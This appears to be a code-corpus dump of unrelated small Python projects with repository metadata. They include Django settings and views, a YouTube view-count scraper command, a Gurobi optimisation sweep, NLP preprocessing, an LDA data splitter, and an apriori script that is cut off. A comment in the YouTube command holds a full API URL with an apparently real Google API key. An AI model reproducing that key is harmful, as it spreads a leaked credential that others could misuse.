ALLOWED_HOSTS = ['mathiasamare.herokuapp.com','127.0.0.1']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'base',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'yohanneswebsite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'yohanneswebsite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
'HOST': 'database endpoint',
'PORT': 'database port'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
#STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
#STATIC_URL = '/staticfiles/'
#MEDIA_URL = '/images/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/staticfiles/'
MEDIA_URL = '/images/'
# Extra locations collectstatic searches in addition to each app's
# static/ directory.  The original file assigned this identical list
# twice in a row; the redundant second assignment has been removed.
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, 'static')
]
|
[
"joelawro@gmail.com"
] |
joelawro@gmail.com
|
173430881189eee39a6784e04ac5bea75aad27ec
|
683bf84a00834a946416c96a0c311f6c8a56825a
|
/4.7_working_with_files.py
|
9da5d0da773269ceb98f36ea7e6246a1f0664f2b
|
[] |
no_license
|
ravinder79/python-exercises
|
39404cbd3cf1259d13cd51afa4dd92a98afdbd19
|
0db0499486f393b4957b72114aa6fc572043e55e
|
refs/heads/master
| 2021-01-06T18:04:02.977079
| 2020-11-03T02:30:12
| 2020-11-03T02:30:12
| 241,430,488
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,755
|
py
|
#Print out every line in the file.
#Print out every line in the file, but add a line numbers
# Read the whole exercise file into memory, then print it with 1-based
# line numbers prefixed (enumerate starts at 0, hence i+1).
with open('4.6_import_exercises.py', 'r') as f:
    data = f.readlines()
for i, line in enumerate(data):
    print(i+1, line)
#Print out every line in the file, but add a line numbers
#count = 0
# with open('4.6_import_exercises.py', 'r') as f:
#     for lines in f:
#         print(str(count)+'\t'+lines)
#         count = count +1
# Create a variable named grocery_list. It should be a list, and the elements in the list should be a least 3 things
# that you need to buy from the grocery store.
grocery_list = ['milk', 'eggs', 'coke', 'chips']
# Create a function named make_grocery_list. When run, this function should write the contents of the grocery_list
# variable to a file named my_grocery_list.txt.
def make_grocery_list(items):
    """Write each entry of *items* to grocery_list.txt, one per line.

    Fixes two defects in the original:
    - the write used an unterminated string literal (``'\\n)``), which was
      a SyntaxError, so the file never imported;
    - the parameter shadowed the builtin ``list`` (renamed to ``items``;
      all in-file callers pass it positionally, so this is compatible).
    The original also returned the already-closed file handle, which no
    caller used; this version returns None.
    """
    with open("grocery_list.txt", "w") as f:
        # writelines accepts any iterable of strings; newlines added here
        # because writelines does not append them.
        f.writelines(item + '\n' for item in items)
make_grocery_list(grocery_list)
# Create a function named show_grocery_list. When run, it should read the items from the text file and show each item on the grocery list.
# def show_grocery_list(grocery_list):
# with open("grocery_list.txt", "r") as f:
# print(f.readlines())
def show_grocery_list(grocery_list):
    """Print every saved grocery item by re-reading grocery_list.txt.

    Note: the *grocery_list* argument is ignored; the display always
    reflects what is currently on disk.
    """
    with open("grocery_list.txt", "r") as f:
        saved_lines = f.readlines()
    # Each stored line keeps its trailing newline, matching the
    # original's double-spaced output.
    for entry in saved_lines:
        print(entry)
# Create a function named buy_item. It should accept the name of an item on the grocery list, and remove that item from the list.
def buy_item(item):
    # Remove *item* from the module-level grocery_list (raises ValueError
    # if absent), persist the shortened list to disk, then print it.
    grocery_list.remove(item)
    make_grocery_list(grocery_list)
    return show_grocery_list(grocery_list)
# Runs at import time: removes 'eggs' from the list and reprints it.
buy_item('eggs')
|
[
"ravinder79@gmail.com"
] |
ravinder79@gmail.com
|
68416e62dea54f46e7ba4cf6455434a962307eaf
|
a079a2b493095b354d3f5ec09a9fccddd4de0a6a
|
/youtubetracker/management/commands/populate_viewsapi.py
|
b222d8b0289179e5433387a662063abd4caf6022
|
[] |
no_license
|
benjo430/youtube-tracker
|
96d5f2798f93214abd9d61e1b5a6925a3c4c5186
|
9392df7406b55cb72fad7a7eedd476c4ef0ec761
|
refs/heads/master
| 2021-01-19T08:46:16.332966
| 2017-04-11T03:34:35
| 2017-04-11T03:34:35
| 87,673,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,728
|
py
|
from django.core.management.base import BaseCommand
from youtubetracker.models import Video, Viewcount
import requests
from lxml import html
import time
import datetime
import urlparse
import json
from parse import *
from datetime import timedelta
class Command(BaseCommand):
    # Management command (Python 2): records today's YouTube view count for
    # every Video in the database, once per day per video.
    # This class allows us to run database populating commands by typing "python manage.py populate_db" into terminal
    # Read here for more info: http://eli.thegreenplace.net/2014/02/15/programmatically-populating-a-django-database
    # turn into two scripts (separate files) one to populate database from a spreadsheet and another to update all entries in database to add view counts for the day.
    args = '<foo bar ...>'
    help = 'our help string comes here'
    #"https://www.googleapis.com/youtube/v3/videos?id=YLzTFYYDnnk&key=AIzaSyAveZmaAE0CHPPt6dSY4o_oitb-QTKp9ZU%20&part=snippet,statistics"
    # Broken Vid: https://www.youtube.com/watch?v=ytZW3iyoFho

    def populate(self):
        # For each video: skip if today's count already exists, otherwise try
        # the YouTube API first, fall back to scraping, and finally to 0.
        # NOTE(review): get_video_id/tryapi/tryscrape come from
        # `from parse import *` — confirm against that module.
        allvideos = Video.objects.all()
        print "Populating View Count for all videos in database..."
        for video in allvideos:
            if get_video_id(video.url) is not None:
                videoid = get_video_id(video.url)
                # Grab all viewcounts for this video and check the date to ensure its not today.
                mostrecentdate = video.viewcount_set.order_by('-id')
                empty = False
                today = datetime.date.today()
                if not mostrecentdate:
                    empty = True
                else:
                    mostrecentdate = mostrecentdate[0].viewcountdate
                if mostrecentdate != today or empty == True:
                    apiattempt = tryapi(videoid)
                    if apiattempt != False:
                        viewcountint = apiattempt
                    else:
                        scrapeattempt = tryscrape(videoid)
                        if scrapeattempt != False:
                            viewcountint = scrapeattempt
                        else:
                            print "!!!!!! -------- OUT OF OPTIONS. SETTING TO 0"
                            viewcountint = 0
                    try:
                        q = Video.objects.get(url=video.url)
                        q.viewcount_set.create(viewcountdate=today,viewcount=viewcountint)
                        print "SUCCESSFULLY SAVED!"
                    except:
                        print "Already added view count" + video.url
        # try:
        #     q = Video.objects.get(url=video.url)
        #     q.viewcount_set.create(viewcountdate=today,viewcount=viewcountint)
        # except:
        #     print "Already added view count" + video.url

    def handle(self, *args, **options):
        # Entry point invoked by `python manage.py <command>`.
        self.populate()
|
[
"benjo430@gmail.com"
] |
benjo430@gmail.com
|
73cf7cad52d0463b57d1ecf16f881b12da289fbd
|
102f42fc41326e89ff2cfdfb227d57e122c78800
|
/prime.py
|
04aef932140d124e6731a95f3f03b0590956fdd7
|
[] |
no_license
|
yamatharman/guvi
|
ca741917385cc6c4ef8631308397f8ca5865060f
|
3351ab1af30a62c052ba9a385679f0b6b33cf47b
|
refs/heads/master
| 2020-03-27T17:42:43.390166
| 2019-02-20T05:48:28
| 2019-02-20T05:48:28
| 146,868,650
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
#prime.py
# Read an integer and report primality: prints "no" on the first divisor
# found, "yes" if none is found, and "Invalid" for inputs <= 1.
num = int(input())
if num > 1:
    # Trial division over 2..num-1; the for/else "yes" branch runs only
    # when the loop completes without hitting `break`.
    for i in range(2,num):
        if (num % i) == 0:
            print("no")
            break
    else:
        print("yes")
else:
    print("Invalid")
|
[
"noreply@github.com"
] |
noreply@github.com
|
e5d021f764bf2a500658c2a962784f56ffc0f864
|
2b167e29ba07e9f577c20c54cb943861d0ccfa69
|
/numerical_analysis_backup/small-scale-multiobj/pod100_sa/pareto_arch2/pareto_ff/pareto8.py
|
c934f4633c223ab3a0093473ad66da38262a6453
|
[] |
no_license
|
LiYan1988/kthOld_OFC
|
17aeeed21e195d1a9a3262ec2e67d6b1d3f9ff0f
|
b1237577ea68ad735a65981bf29584ebd889132b
|
refs/heads/master
| 2021-01-11T17:27:25.574431
| 2017-01-23T05:32:35
| 2017-01-23T05:32:35
| 79,773,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,048
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 4 15:15:10 2016

@author: li

optimize both throughput and connections

Sweeps the throughput weight ``beta`` over three ranges and, for each
value, solves the routing model and runs the SA heuristic, recording
upper and lower bounds on connections, throughput, and the combined
objective.  Results are written to result_pareto<i>.csv.
"""
#import sys
#sys.path.insert(0, '/home/li/Dropbox/KTH/numerical_analysis/ILPs')
import csv
from gurobipy import *
import numpy as np
from arch2_decomposition_new import Arch2_decompose

np.random.seed(2010)

num_cores=3
num_slots=80
i = 8
time_limit_routing = 1200 # 1000
time_limit_sa = 108 # 10800

filename = 'traffic_matrix__matrix_'+str(i)+'.csv'
# print filename
tm = []
# Rows after index 11 hold the traffic matrix; the trailing cell of each
# row is dropped before conversion to int.
with open(filename) as f:
    reader = csv.reader(f)
    for idx, row in enumerate(reader):
        if idx>11:
            row.pop()
            row = [int(u) for u in row]
            tm.append(row)
tm = np.array(tm)*25

#%% arch2
# Three beta ranges: fine steps near 0, coarse up to 1, then 10..100.
betav1 = np.arange(0,0.105,0.005)
betav2 = np.arange(0.15,1.05,0.05)
betav3 = np.arange(10, 110, 10)
betav = np.concatenate((betav1, betav2, betav3))
connection_ub = []
throughput_ub = []
connection_lb = []
throughput_lb = []
obj_ub = []
obj_lb = []
for beta in betav:
    m = Arch2_decompose(tm, num_slots=num_slots, num_cores=num_cores,alpha=1,beta=beta)
    # Upper bound from the relaxed routing model, lower bound from SA.
    m.create_model_routing(mipfocus=1,timelimit=time_limit_routing,mipgap=0.01, method=2)
    m.sa_heuristic(ascending1=False,ascending2=False)
    connection_ub.append(m.connections_ub)
    throughput_ub.append(m.throughput_ub)
    obj_ub.append(m.alpha*m.connections_ub+m.beta*m.throughput_ub)
    connection_lb.append(m.obj_sah_connection_)
    throughput_lb.append(m.obj_sah_throughput_)
    obj_lb.append(m.alpha*m.obj_sah_connection_+m.beta*m.obj_sah_throughput_)
    # print m.obj_sah_/float(m.alpha*m.connections_ub+m.beta*m.throughput_ub)

# One row per beta value, bounds in columns.
result = np.array([betav,connection_ub,throughput_ub,obj_ub,
                   connection_lb,throughput_lb,obj_lb]).T
file_name = "result_pareto{}.csv".format(i)
with open(file_name, 'w') as f:
    writer = csv.writer(f, delimiter=',')
    writer.writerow(['beta', 'connection_ub', 'throughput_ub',
                     'obj_ub', 'connection_lb', 'throughput_lb', 'obj_lb'])
    writer.writerows(result)
|
[
"li.yan.ly414@gmail.com"
] |
li.yan.ly414@gmail.com
|
4263c48ffd860e12a9590234e84baa57b8698a54
|
1d49dd44b5cadc173bacbfbbbfc8facd5665066f
|
/utils/preprocessing.py
|
b03f803fee123f87d685d033c90c89344bf5c714
|
[] |
no_license
|
anushalihala/text_analytics_propaganda_detection
|
eee34d23589c4fdb2580ddfabb9b54c828137424
|
bf6d64ed84d8ab79e5509c63bec7844b395b4436
|
refs/heads/master
| 2021-05-23T08:53:03.200357
| 2020-04-12T13:24:43
| 2020-04-12T13:24:43
| 253,207,748
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,665
|
py
|
import numpy as np
from nltk.tokenize import sent_tokenize
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
def map_target(df, col_name='target'):
    """Encode the label column: 'propaganda' -> 1, 'non-propaganda' -> 0.

    Any other label maps to NaN (pandas Series.map semantics).
    """
    label_codes = {'propaganda': 1, 'non-propaganda': 0}
    return df[col_name].map(label_codes)
def tokenize_text(text, word_to_idx):
    """Lowercase *text*, word-tokenize it, and map tokens to vocab indices.

    Out-of-vocabulary tokens fall back to ``word_to_idx['UNK']``.

    Bug fix: the original called ``word_tokenize`` without importing it
    (only ``sent_tokenize`` is imported at module level), so every call
    raised NameError.  The import is done locally here to keep the fix
    self-contained.
    """
    from nltk.tokenize import word_tokenize
    text = text.lower()
    tokens = word_tokenize(text)
    # Return a list (as the original's list(map(...)) did).
    return [word_to_idx.get(tok, word_to_idx['UNK']) for tok in tokens]
def process_df(df, text_processor, processor_args, get_len=True):
    """Prepare a dataframe in place: numeric labels, processed text, optional length.

    *text_processor* is applied to each row of ``df['text']`` with
    **processor_args as keyword arguments; when *get_len* is true a
    ``len`` column is derived from the processed text.  Returns *df*.
    """
    df['target'] = map_target(df)
    df['text'] = df['text'].apply(lambda raw: text_processor(raw, **processor_args))
    if get_len:
        df['len'] = df['text'].apply(len)
    return df
def get_sentiment_features(df, text_col='text', id_col='id'):
    """Aggregate per-sentence VADER sentiment scores per document.

    For each row of df[text_col], scores every sentence with VADER and
    records the max/min/median of the neg/pos/neu components.  Returns a
    dict of nine feature lists plus the documents' ids under 'id'.
    """
    analyzer = SentimentIntensityAnalyzer()
    features = {'neg_max':[], 'neg_min':[], 'neg_median':[], \
                'pos_max':[], 'pos_min':[], 'pos_median':[], \
                'neu_max':[], 'neu_min':[], 'neu_median':[]}
    feature_fns = {'max':np.max, 'min':np.min, 'median':np.median}
    for text in df[text_col]:
        # Collect the per-sentence component scores for this document.
        vs_lists = {'neg':[], 'pos':[], 'neu':[]}
        for sent in sent_tokenize(text):
            vs = analyzer.polarity_scores(sent)
            for k in vs_lists.keys():
                vs_lists[k].append(vs[k])
        # Reduce each component's sentence scores to max/min/median.
        for k, vs_list in vs_lists.items():
            for f, fn in feature_fns.items():
                features[k+'_'+f].append(fn(vs_list))
    features['id'] = df[id_col].values.tolist()
    return features
|
[
"35848893+anushalihala@users.noreply.github.com"
] |
35848893+anushalihala@users.noreply.github.com
|
fc07069a46f82e9a773e82a5a7eb0fb9601e5399
|
6782adf725cd62576310e3b017be4c8e9703efea
|
/users/views.py
|
7d3046389893cfb666bd52f4ef2a4b01d3a19a78
|
[] |
no_license
|
momentum-team-4/django-final-project-jacqueline-harrison
|
e2b566dd28221e4f3ccf3bb5d58a267a05f39f21
|
355d6e14914cb1c9126dddc7b351834713c7d29e
|
refs/heads/master
| 2023-07-31T22:13:12.027385
| 2020-10-01T17:11:45
| 2020-10-01T17:11:45
| 298,834,657
| 0
| 0
| null | 2021-09-22T19:43:35
| 2020-09-26T14:44:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,273
|
py
|
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.messages import success, error
from .forms import UserCreationForm
from .models import User
def create_user(request):
    # Sign-up view: GET renders an empty form; POST validates it, saves the
    # new user, flashes a success message and redirects to the login page.
    # Invalid POSTs fall through and re-render the form with its errors.
    if request.method == "GET":
        form = UserCreationForm()
    else:
        form = UserCreationForm(data=request.POST)
        if form.is_valid():
            form.save()
            success(request, 'Login created')
            return redirect(to='login_user')
    return render(request, 'accounts/create_user.html', {"form": form})
def login_user(request):
    # Login view: on POST, authenticate the posted credentials; success
    # logs the user in and redirects to the habits page, failure flashes
    # an error and re-renders the login form.  GET just shows the form.
    if request.method == "POST":
        username = request.POST['username']
        password = request.POST['password']
        user = authenticate(request, username=username, password=password)
        if user is not None:
            login(request, user)
            success(request, 'Logged in Successfully')
            return redirect(to='all_habits')
        else:
            error(request, 'username or password does not exist')
    return render(request, 'accounts/login_user.html')
@login_required
def logout_user(request):
    # End the session and send the (now anonymous) user back to the login page.
    logout(request)
    return redirect(to='login_user')
|
[
"jacqueline_25@hotmail.com"
] |
jacqueline_25@hotmail.com
|
26604b1e653b586dcc138356474bf5459ea54e2e
|
604fdb2c4fa24237d206e7c8835bb2c21b0a2fb7
|
/ari/v1/client.py
|
0f438dfd979c9fed793cc6fef8f04f0b37e2bc6d
|
[
"Apache-2.0"
] |
permissive
|
SibghatullahSheikh/python-ari
|
d8d87d213c1a52b0ed46a8ea50362b93c772325b
|
f4a6f870513bc74bf96606168e0d2173ed2f2ebb
|
refs/heads/master
| 2021-01-22T00:13:37.707863
| 2014-01-29T21:06:52
| 2014-01-29T21:06:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,344
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2012 OpenStack LLC.
# Copyright (c) 2013 PolyBeacon, Inc.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from ari.common import http
from ari.v1 import application
from ari.v1 import bridge
from ari.v1 import channel
from ari.v1 import devicestate
from ari.v1 import endpoint
from ari.v1 import sound
class Client(http.HTTPClient):
    """Client for the ARI v1 API.

    On construction, attaches one resource manager per ARI collection,
    each sharing this HTTP client instance.
    """

    def __init__(self, *args, **kwargs):
        super(Client, self).__init__(*args, **kwargs)
        # (attribute name, manager class) pairs — one per API collection.
        manager_table = (
            ('applications', application.ApplicationManager),
            ('bridges', bridge.BridgeManager),
            ('channels', channel.ChannelManager),
            ('devicestates', devicestate.DeviceStateManager),
            ('endpoints', endpoint.EndpointManager),
            ('sounds', sound.SoundManager),
        )
        for attr_name, manager_cls in manager_table:
            setattr(self, attr_name, manager_cls(self))
|
[
"paul.belanger@polybeacon.com"
] |
paul.belanger@polybeacon.com
|
267f051b5e058cd2c27f5c5f7de155cd7f7c48c0
|
142c458d4e9fee7f5dd810d75763903d6789ad34
|
/classfy_id_new.py
|
1fde20b270abe1550c51dee27fb75d9d257cef70
|
[] |
no_license
|
Pengfight/testfile
|
c5bfb5fbc2cc77072f48521a85b1e7b6cec9c456
|
c067995495f5a119f7cea4ddd49bb14dd40e9a3d
|
refs/heads/master
| 2021-04-26T22:14:13.598400
| 2018-03-24T02:32:08
| 2018-03-24T02:32:08
| 124,047,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,789
|
py
|
import json
import os
class lda_learning():
    # Prepares trip data for warplda topic modelling: bucket trips by
    # length, format the buckets, and train per-bucket models.
    # NOTE(review): statement nesting below was reconstructed from
    # whitespace-mangled source — confirm against the original file.

    def classfy_city_data(self):
        '''
        Divide the data set according to the number of days of trip,
        divided into 4 days, 4-5 days, 6-7 days, 8-10 days,
        10 days and above,five kinds of situations.
        the format of each line:id trip-id word word word...
        The length of word is 4 hours, rounding up.
        '''
        time_sum=0.0
        # Per-bucket running row ids (become the first column of each file).
        rid1=0
        rid2=0
        rid3=0
        rid4=0
        rid5=0
        citys_arry=[]
        with open('../data/path_json_with_time1.json',encoding='utf-8') as fd:
            loaded = json.load(fd)
        # One output file per trip-length bucket.
        outfile1=open('../data/cityHours_doc_train_dis_4.txt','w',encoding='utf-8')
        outfile2=open('../data/cityHours_doc_train_dis_4-5.txt','w',encoding='utf-8')
        outfile3=open('../data/cityHours_doc_train_dis_6-7.txt','w',encoding='utf-8')
        outfile4=open('../data/cityHours_doc_train_dis_8-10.txt','w',encoding='utf-8')
        outfile5=open('../data/cityHours_doc_train_dis_10.txt','w',encoding='utf-8')
        for path in loaded:
            citys_arry=[]
            citylist=''
            for place in path:
                time_sum=0.0
                if place.get(u'type') == 'place':
                    place_name = place.get(u'name')
                    trip_id=place.get(u'plan_id')
                    if place_name not in citys_arry:
                        citys_arry.append(place_name)
                    trave_time=place.get(u'travel_times')
                    for i in range(len(trave_time)):
                        time_sum+=float(trave_time[i])
                    # A stay that rounds to 0 hours still counts as one 4h word.
                    if int(time_sum) == 0:
                        time_sum=4
                    # Repeat the city name once per 4-hour block spent there.
                    citylist+=(str(place_name)+' ')*int((time_sum/4))
            # Bucket the trip by how many distinct cities it visited.
            if len(citys_arry)<4:
                rid1+=1
                outfile1.write(str(rid1)+' '+str(trip_id)+' ')
                outfile1.write(citylist)
                outfile1.write('\n')
            elif len(citys_arry)<=5:
                rid2+=1
                outfile2.write(str(rid2)+' '+str(trip_id)+' ')
                outfile2.write(citylist)
                outfile2.write('\n')
            elif len(citys_arry)<=7:
                rid3+=1
                outfile3.write(str(rid3)+' '+str(trip_id)+' ')
                outfile3.write(citylist)
                outfile3.write('\n')
            elif len(citys_arry)<=10:
                rid4+=1
                outfile4.write(str(rid4)+' '+str(trip_id)+' ')
                outfile4.write(citylist)
                outfile4.write('\n')
            else:
                rid5+=1
                outfile5.write(str(rid5)+' '+str(trip_id)+' ')
                outfile5.write(citylist)
                outfile5.write('\n')
        fd.close()
        outfile1.close()
        outfile2.close()
        outfile3.close()
        outfile4.close()
        outfile5.close()

    def data_format(self):
        '''
        format training data sets
        '''
        #copy data file
        os.system("cp ../data/cityHours_doc_train_dis_4.txt ../../../tools/warplda/data")
        os.system("cp ../data/cityHours_doc_train_dis_4-5.txt ../../../tools/warplda/data")
        os.system("cp ../data/cityHours_doc_train_dis_6-7.txt ../../../tools/warplda/data")
        os.system("cp ../data/cityHours_doc_train_dis_8-10.txt ../../../tools/warplda/data")
        os.system("cp ../data/cityHours_doc_train_dis_10.txt ../../../tools/warplda/data")
        #format data sets
        os.system("cd ../data;../../../tools/warplda/release/src/format -input ./warplda/data/cityHours_doc_train_dis_4.txt -prefix train4")
        os.system("cd ../data;../../../tools/warplda/release/src/format -input ./warplda/data/cityHours_doc_train_dis_4-5.txt -prefix train4_5")
        os.system("cd ../data;../../../tools/warplda/release/src/format -input ./warplda/data/cityHours_doc_train_dis_6-7.txt -prefix train6_7")
        os.system("cd ../data;../../../tools/warplda/release/src/format -input ./warplda/data/cityHours_doc_train_dis_8-10.txt -prefix train8_10")
        os.system("cd ../data;../../../tools/warplda/release/src/format -input ./warplda/data/cityHours_doc_train_dis_10.txt -prefix train10")

    def training(self,days,k,niter):
        '''
        train data sets and get topic model
        :param days: the kind of data set
            (e.g. 4:4 days, 4_5:4-5 days, 6_7:6-7 days, 8_10:8-10 days, 10:10 days)
        :param k: the number of topics
        :param niter: the number of iterations
        '''
        os.system("cd ../data;../../../tools/warplda/release/src/warplda --prefix train"+days+" --k "+k+" --niter "+niter)
        #os.system("mv ../tools/warplda/release/src/train"+days+".info.full.txt train6_7.info11.full.txt")
|
[
"noreply@github.com"
] |
noreply@github.com
|
5d64b3ec43f8f8706fbb5bc2f4c1dea3573739ee
|
d6d87140d929262b5228659f89a69571c8669ec1
|
/airbyte-connector-builder-server/connector_builder/generated/models/stream_slicer.py
|
56c37db2c82d4d65076de8f3b5e19e85d772378d
|
[
"MIT",
"Elastic-2.0"
] |
permissive
|
gasparakos/airbyte
|
b2bb2246ec6a10e1f86293da9d86c61fc4a4ac65
|
17c77fc819ef3732fb1b20fa4c1932be258f0ee9
|
refs/heads/master
| 2023-02-22T20:42:45.400851
| 2023-02-09T07:43:24
| 2023-02-09T07:43:24
| 303,604,219
| 0
| 0
|
MIT
| 2020-10-13T06:18:04
| 2020-10-13T06:06:17
| null |
UTF-8
|
Python
| false
| false
| 527
|
py
|
# coding: utf-8
from __future__ import annotations
from datetime import date, datetime # noqa: F401
import re # noqa: F401
from typing import Any, Dict, List, Optional # noqa: F401
from pydantic import AnyUrl, BaseModel, EmailStr, Field, validator # noqa: F401
class StreamSlicer(BaseModel):
    """NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).

    Do not edit the class manually.

    StreamSlicer - a model defined in OpenAPI
    """

# Resolve any forward (string) type references in the model's annotations.
StreamSlicer.update_forward_refs()
|
[
"noreply@github.com"
] |
noreply@github.com
|
04a004618f6c38d9bfac1befca74c661217cb50f
|
d300d3953fb55eb271c8afcf5cf03b2635ca4e4c
|
/D A/python/关联apriori.py
|
6e25145eb90fe4fa307a0e7441fb41434e8005b2
|
[] |
no_license
|
JamesBrowns/data-analysis
|
fc1bc61d797f0d7e985280b62e617c86322a3ea3
|
119adb5570ab68560744dd516577b07f947ca1aa
|
refs/heads/master
| 2020-03-18T04:29:51.185087
| 2018-03-08T07:18:12
| 2018-03-08T07:18:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,735
|
py
|
#coding=utf-8
import pandas as pd
from sklearn.cluster import KMeans
'''
#聚类离散化
datafile='chapter8/demo/data/data.xls'
outputfile='chapter8/out/processed_data.xls'
typelabel ={u'肝气郁结证型系数':'A', u'热毒蕴结证型系数':'B', u'冲任失调证型系数':'C', u'气血两虚证型系数':'D', u'脾胃虚弱证型系数':'E', u'肝肾阴虚证型系数':'F'}
k=4
#读取数据并进行聚类分析
data=pd.read_excel(datafile)
keys=list(typelabel.keys())
result=pd.DataFrame()
if __name__ == '__main__':
for i in range(len(keys)):
#调用聚类
print u'正在进行%s的的聚类'%keys[i]
kmodel=KMeans(n_clusters=k,n_jobs=1)
#print keys[i]
#print [keys[i]]
#print data[[keys[i]]][:5]
kmodel.fit(data[[keys[i]]].as_matrix())
r1=pd.Series(kmodel.labels_).value_counts()
r2=pd.DataFrame(kmodel.cluster_centers_,
columns=[typelabel[keys[i]]])
r1=pd.DataFrame(r1,columns=[typelabel[keys[i]]+'n'])
#r=pd.concat([r2,r1],axis=1)
r=pd.concat([r2,r1],axis=1).sort_values(by=[typelabel[keys[i]]])
r.index=[1,2,3,4]
print r
r[typelabel[keys[i]]]=pd.rolling_mean(r[typelabel[keys[i]]],2)
print r
#用来计算相邻两列的均值,以此作为边界点
r[typelabel[keys[i]]][1]=0.0
print r
#这两句代码将原来的聚类中心改为边界点
result=result.append(r.T)
print result
result=result.sort_index()
result.to_excel(outputfile)
'''
#利用关联规则
#导入编写的apriori
# Candidate generation: join frequent (k-1)-itemsets (L_{k-1}) into
# candidate k-itemsets (C_k).
def connect_string(x, ms):
    """Merge pairs of ``ms``-joined itemset strings that share all but
    their last sorted item, returning the merged candidates as lists."""
    itemsets = [sorted(s.split(ms)) for s in x]
    prefix_len = len(itemsets[0]) - 1
    candidates = []
    for a in range(len(itemsets)):
        for b in range(a, len(itemsets)):
            left, right = itemsets[a], itemsets[b]
            if left[:prefix_len] == right[:prefix_len] and left[prefix_len] != right[prefix_len]:
                candidates.append(left[:prefix_len] + sorted([right[prefix_len], left[prefix_len]]))
    return candidates
# Apriori association-rule search.
def find_rule(d, support, confidence, ms = u'--'):
    # d: 0/1 transaction DataFrame (one column per item); returns rules
    # above the given support and confidence thresholds, sorted descending.
    result = pd.DataFrame(index=['support', 'confidence']) # holds the output rules
    support_series = 1.0*d.sum()/len(d) # item support series
    column = list(support_series[support_series > support].index) # initial filter by support
    k = 0
    while len(column) > 1:
        k = k+1
        print(u'\n正在进行第%s次搜索...' %k)
        column = connect_string(column, ms)
        print(u'数目:%s...' %len(column))
        # Support of a candidate = mean of the product of its item columns.
        sf = lambda i: d[i].prod(axis=1, numeric_only = True)
        # Building the joined columns is the most time/memory intensive step;
        # consider parallelising for large data sets.
        d_2 = pd.DataFrame(list(map(sf,column)), index = [ms.join(i) for i in column]).T
        support_series_2 = 1.0*d_2[[ms.join(i) for i in column]].sum()/len(d) # support after the join
        column = list(support_series_2[support_series_2 > support].index) # filter the new candidates
        support_series = support_series.append(support_series_2)
        column2 = []
        # Enumerate every possible consequent: for {A,B,C} try A+B->C,
        # B+C->A and C+A->B (the moved item goes last).
        for i in column:
            i = i.split(ms)
            for j in range(len(i)):
                column2.append(i[:j]+i[j+1:]+i[j:j+1])
        cofidence_series = pd.Series(index=[ms.join(i) for i in column2]) # confidence series
        for i in column2: # confidence = support(full set) / support(antecedent)
            cofidence_series[ms.join(i)] = support_series[ms.join(sorted(i))]/support_series[ms.join(i[:len(i)-1])]
        for i in cofidence_series[cofidence_series > confidence].index: # filter by confidence
            result[i] = 0.0
            result[i]['confidence'] = cofidence_series[i]
            result[i]['support'] = support_series[ms.join(sorted(i.split(ms)))]
    result = result.T.sort_values(['confidence','support'], ascending = False) # tidy and sort the output
    print u'\n结果为:'
    print result
    return result
# Driver: load transactions, binarise them, and mine the rules (Python 2).
import time

inputfile='chapter8/demo/data/apriori.txt'
data=pd.read_csv(inputfile,header=None,dtype=object)

start=time.clock() # start timing
print u'\n转换矩阵开始0-1....'
ct=lambda x:pd.Series(1,index=x[pd.notnull(x)])
